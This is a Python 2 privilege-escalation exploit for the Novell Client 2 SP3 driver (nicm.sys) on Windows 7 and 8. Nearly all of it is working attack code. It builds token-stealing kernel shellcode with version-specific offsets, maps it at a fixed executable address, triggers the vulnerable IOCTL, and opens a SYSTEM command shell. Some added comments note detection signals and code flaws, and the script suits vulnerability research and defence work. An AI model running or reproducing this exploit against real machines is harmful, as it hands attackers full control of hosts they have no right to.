# Novell Client 2 SP3 Privilege escalation exploit
# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0
# Thanks to Master Ryujin :)
# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure whether there was anything else public)
# Exploit for DEMO purposes :)
# Does not bypass SMEP on Windows 8
# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/
from ctypes import *
import sys,struct,os
from optparse import OptionParser
kernel32 = windll.kernel32
ntdll = windll.ntdll
if __name__ == '__main__':
    # Python 2 script: print statements, and str literals are used as raw bytes.
    # Flow: parse the target OS, select version-specific offsets, assemble the
    # payload, map it at a fixed user-mode address, then pass the driver a
    # buffer pointing at it through the IOCTL named below.
    usage = "%prog -o <target>"
    parser = OptionParser(usage=usage)
    parser.add_option("-o", type="string",
                      action="store", dest="target_os",
                      help="Available target operating systems: WIN7, WIN8")
    (options, args) = parser.parse_args()
    OS = options.target_os
    # Only the two listed targets are supported; anything else prints usage and exits.
    if not OS or OS.upper() not in ['WIN7','WIN8']:
        parser.print_help()
        sys.exit()
    OS = OS.upper()
    if OS == "WIN7":
        # Structure offsets for this Windows build. They are spliced into the
        # payload bytes below, which is why the payload is version-specific
        # (and why it breaks when the kernel layout changes).
        _KPROCESS = "\x50" # Offset for Win7
        _TOKEN = "\xf8" # Offset for Win7
        _UPID = "\xb4" # Offset for Win7
        _APLINKS = "\xb8" # Offset for Win7
        # Kernel-mode payload; its own name says what it does (token stealing).
        # Not annotated instruction by instruction here.
        steal_token = "\x52" +\
        "\x53" +\
        "\x33\xc0" +\
        "\x64\x8b\x80\x24\x01\x00\x00" +\
        "\x8b\x40" + _KPROCESS +\
        "\x8b\xc8" +\
        "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
        "\x89\x1d\x00\x09\x02\x00" +\
        "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
        "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
        "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
        "\x75\xe8" +\
        "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
        "\x8b\xc1" +\
        "\x89\x90" + _TOKEN + "\x00\x00\x00" +\
        "\x5b" +\
        "\x5a" +\
        "\xc2\x08"
        sc = steal_token
    else:
        # Same structure as the Win7 branch with the Win8 offsets; note the
        # _KPROCESS load is encoded with a 4-byte displacement here.
        _KPROCESS = "\x80" # Offset for Win8
        _TOKEN = "\xEC" # Offset for Win8
        _UPID = "\xB4" # Offset for Win8
        _APLINKS = "\xB8" # Offset for Win8
        steal_token = "\x52" +\
        "\x53" +\
        "\x33\xc0" +\
        "\x64\x8b\x80\x24\x01\x00\x00" +\
        "\x8b\x80" + _KPROCESS + "\x00\x00\x00"+\
        "\x8b\xc8" +\
        "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
        "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
        "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
        "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
        "\x75\xe8" +\
        "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
        "\x8b\xc1" +\
        "\x89\x90" + _TOKEN + "\x00\x00\x00" +\
        "\x5b" +\
        "\x5a" +\
        "\xc2\x08"
        sc = steal_token
    # Buffer handed to the driver: little-endian pointer values back into the
    # region mapped at 0x0d0d0000 below, "A" filler, and the payload appended
    # last. The input-buffer length passed to the IOCTL (inut_size) is only
    # 0x14 bytes, i.e. the first row of this buffer.
    kernel_sc = "\x14\x00\x0d\x0d"
    kernel_sc+= "\x41\x41\x41\x41"
    kernel_sc+= "\x41\x41\x41\x41"
    kernel_sc+= "\x41\x41\x41\x41"
    kernel_sc+= "\x41\x41\x41\x41"
    kernel_sc+= "\x18\x00\x0d\x0d"
    kernel_sc+= "\x41\x41\x41\x41"
    kernel_sc+= "\x41\x41\x41\x41"
    kernel_sc+= "\x41\x41\x41\x41"
    kernel_sc+= "\x28\x00\x0d\x0d"
    kernel_sc+= sc
    print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."
    print "[>] Finding the driver."
    GENERIC_READ = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    # Win32 device path of the driver (nicm.sys per the header).
    # Defender note: an arbitrary user process opening \\.\nicm and issuing the
    # IOCTL code below is a usable detection signal; the mitigation is removing
    # or updating the affected client driver.
    DEVICE = '\\\\.\\nicm'
    device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
    EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL
    retn = c_ulong()
    # The IOCTL input "buffer" is a fixed address, not a Python object: the
    # driver is pointed at the region this script maps below.
    inut_buffer = 0x0d0d0000
    inut_size = 0x14
    output_buffer = 0x0
    output_size = 0x0
    baseadd = c_int(0x0d0d0000)
    MEMRES = (0x1000 | 0x2000) # MEM_COMMIT | MEM_RESERVE
    PAGEEXE = 0x00000040 # PAGE_EXECUTE_READWRITE
    Zero_Bits = c_int(0)
    RegionSize = c_int(0x1000)
    write = c_int(0)
    print "[>] Allocating memory for our shellcode."
    # -1 is the current-process pseudo-handle. A fixed, executable, low
    # user-mode mapping like this is itself a common exploit indicator and is
    # what SMEP is designed to stop (the header notes SMEP is not bypassed).
    # NOTE(review): the returned NTSTATUS (dwStatus) is never checked.
    dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)
    print "[>] Writing the shellcode."
    # NOTE(review): the copy length (0x1000) is far larger than len(kernel_sc),
    # so this reads past the Python string; the return value is not checked.
    kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, 0x1000, byref(write))
    # NOTE(review): with ctypes' default int return type, CreateFileA failure
    # comes back as INVALID_HANDLE_VALUE (-1), which is truthy, so this check
    # does not actually detect a missing driver.
    if device_handler:
        print "[>] Sending IOCTL to the driver."
        dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)
    # The spawned shell is expected to carry the token the payload swapped in;
    # nothing here verifies that the IOCTL succeeded before spawning it.
    print "[>] Dropping to a SYSTEM shell."
    os.system("cmd.exe /K cd C:\\windows\\system32")